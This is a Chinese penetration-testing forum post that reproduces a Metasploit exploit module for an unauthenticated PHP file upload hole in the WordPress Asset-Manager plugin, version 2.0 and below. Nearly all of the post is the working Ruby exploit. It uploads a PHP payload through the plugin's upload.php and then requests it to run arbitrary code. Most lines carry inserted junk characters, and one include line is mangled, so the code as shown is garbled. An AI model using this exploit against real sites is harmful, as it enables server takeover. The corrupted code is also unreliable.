找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2524|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。+ v, y' X0 t: o; b# n& H/ i

$ ~+ B  \; b3 p0 ^" K##  L& n# V% {' Q* m" O
# This file is part of the Metasploit Framework and may be subject to# k* A& W& z3 S, p8 x- d, T
# redistribution and commercial restrictions. Please see the Metasploit
- A; M9 M. G% o# \. }$ p/ J# Framework web site for more information on licensing and terms of use.4 ]8 U- N) m* O6 P  p
#   http://metasploit.com/framework/
+ x- w- T+ O2 a# ^5 L' F" O) d0 d##
& r2 j/ ]! c" u- g. ?( J' S 2 C% @3 w( z  o0 J; ?7 ^  i
require 'msf/core'# i2 g" n) V, ]$ F& G
require 'msf/core/exploit/php_exe'
6 {7 ~! ]& ?$ z) k8 U& r4 I. N
( k8 T7 Q/ p2 X+ g$ [. [class Metasploit3 < Msf::Exploit::Remote5 [/ m% b  d( Q) i, [; z1 e9 G
  Rank = ExcellentRanking
. r  r: u4 O) _% P, ?  I
" t1 Z" F# h; C3 G  include Msf::Exploit::Remote::HttpClient# s2 c( ~, M9 j7 K
  include Msf::Exploit:hpEXE3 g6 y, E, z- w  i* y# X$ {
5 o, r- d/ r! j& J- M( `2 `4 b& J
  def initialize(info = {})
0 x( }" }% W$ E! f$ J9 q    super(update_info(info,
. p* Y! b3 N. J. j* q      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
# J% r/ S; s: I- b0 z4 U      'Description'    => %q{7 J' A! H  p1 g5 W' x, ?
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress8 Z* l/ n8 _, G4 m+ ]) \% ~
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a3 j5 P' D1 q$ m# V# k: K
        temp directory without authentication, which results in arbitrary code execution.6 ^0 j$ p9 ?7 G, Z
      },
0 H! l6 o, O% Z6 k      'Author'         =>+ |% a( y2 Z' ?3 h
        [
4 k2 |7 F: @8 e          'Sammy FORGIT', # initial discovery
# ^5 g5 d5 n, d+ G          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
. n# Z6 Y& `4 V. k: D  h        ],! Z8 Y. R8 Z1 z4 @' x, p" H
      'License'        => MSF_LICENSE,
% D8 F! B8 B% l, e      'References'     =>
7 U( `2 j7 v+ _0 g* f        [
/ {$ J2 C) n/ u: R          [ 'OSVDB', '82653' ],
! X# o, l: ]$ F% _3 v          [ 'BID', '53809' ],( {( G8 k+ v1 [6 e9 y
          [ 'EDB', '18993' ],
4 r$ z5 ], d) w( [4 b0 R          [ 'URL', 'http:// www.myhack58.com /' ]! W. y; ?) A3 Q- C  Z
        ],
: s" q, o1 \4 z      'Payload'       =>
4 S5 U! l8 L0 s9 ?+ s6 l        {  V8 f/ Z. z9 J$ i6 s
          'BadChars' => "\x00",
. f; o0 K2 I4 D0 D- n( n8 E        },
4 z* h* a% K9 E- ]: e/ B      'Platform'       => 'php',
+ ?$ \) {  s( z+ U/ z) a$ i      'Arch'           => ARCH_PHP,0 _4 U1 _& @/ e. h% k$ Z& Y4 g
      'Targets'        =>
3 q# P5 d, H. R3 j        [2 j* ~" a2 I0 |  I
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
" K( m6 M% |( L          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
0 O5 H! O. N7 ~        ],
. t9 |$ U6 |5 d) ]8 A  p1 q* \      'DefaultTarget' => 0,6 S! ]- ^4 e* G% N( ^; B% I, g
      'DisclosureDate' => 'May 26 2012'))
5 r7 m2 ]* Z2 f" [; p6 P  r' H : e6 P4 Q. p! P' D* L
    register_options(! V( g6 T; r9 J0 E; l9 V* {
      [  Y  f( \8 ~/ w5 t$ D2 ^' O/ p- d
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress']); I5 s) V5 e# n. D) F- Y
      ], self.class)
& M6 a$ N0 H: U: J  v' j  end
" a8 G# P6 g; M " P" \) m2 e! Y3 z, B/ E
  def exploit
0 B2 n9 V+ |* H7 m" r    uri =  target_uri.path
. d! h. o7 J0 @9 n! {) x, _$ B    uri << '/' if uri[-1,1] != '/'1 U3 c- b; z0 r8 G7 [% g  W
    peer = "#{rhost}:#{rport}"
' g! L/ [& @& t3 [    payload_name = "#{rand_text_alpha(5)}.php"
" ^0 K9 |' k( k0 n6 r' j& F; q    php_payload = get_write_exec_payload(:unlink_self=>true)7 x: {& s- c+ s0 a
8 n7 m0 G4 s9 l
    data = Rex::MIME::Message.new1 ?: S1 R! ^8 R2 h" @$ B( `
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
; M& Q# t. F* O) i* E) o% o" ]    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
! Z; R# [" Y0 L: R2 N. ?$ u , N1 ]0 Y6 B* l) v2 G& C
    print_status("#{peer} - Uploading payload #{payload_name}")
" v+ k. B8 S; j5 l    res = send_request_cgi({
- ^) E! N: k# O      'method'  => 'POST',- U, ]; U- D$ |/ K" {
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",9 ?* B# P8 v! c9 `
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
8 Y+ F! {+ L7 R. ]( H6 l( R' V      'data'    => post_data
6 {' s: q7 `! V( X" |4 D    })
- J, }' F! ]. C  t
2 F, m1 L0 n1 l0 [: y: e. S; i    if not res or res.code != 200 or res.body !~ /#{payload_name}/% F: P9 f: B. g. u( c9 Y
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")- K9 W6 |5 q" M# ?, B' G0 R9 W
end
2 m0 h; S2 L# R$ ~3 o2 [
) t& H9 F' ~. S8 H' O0 l/ v    print_status("#{peer} - Executing payload #{payload_name}")4 m" b2 J, X) J; ^  l% Y
    res = send_request_raw({. |% k# L) M: s- y# W; Q: F. P
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
9 z/ Q9 q  ^4 {2 ^      'method'  => 'GET'
+ F* K' p! s% A2 R% @    })+ P/ ?' _8 R, `, t  e

4 y$ v9 F+ E+ C! i/ I    if res and res.code != 200& J( r" P0 V5 J6 Z5 I% \0 f* ?
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")3 m* n! x( e' c! E
    end
7 m' n5 c  j  E. e% e7 o  end
& U0 ^* M# y6 ]6 ^, hend
2 i7 c4 {8 v) _6 A  H  o* q5 S! u
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表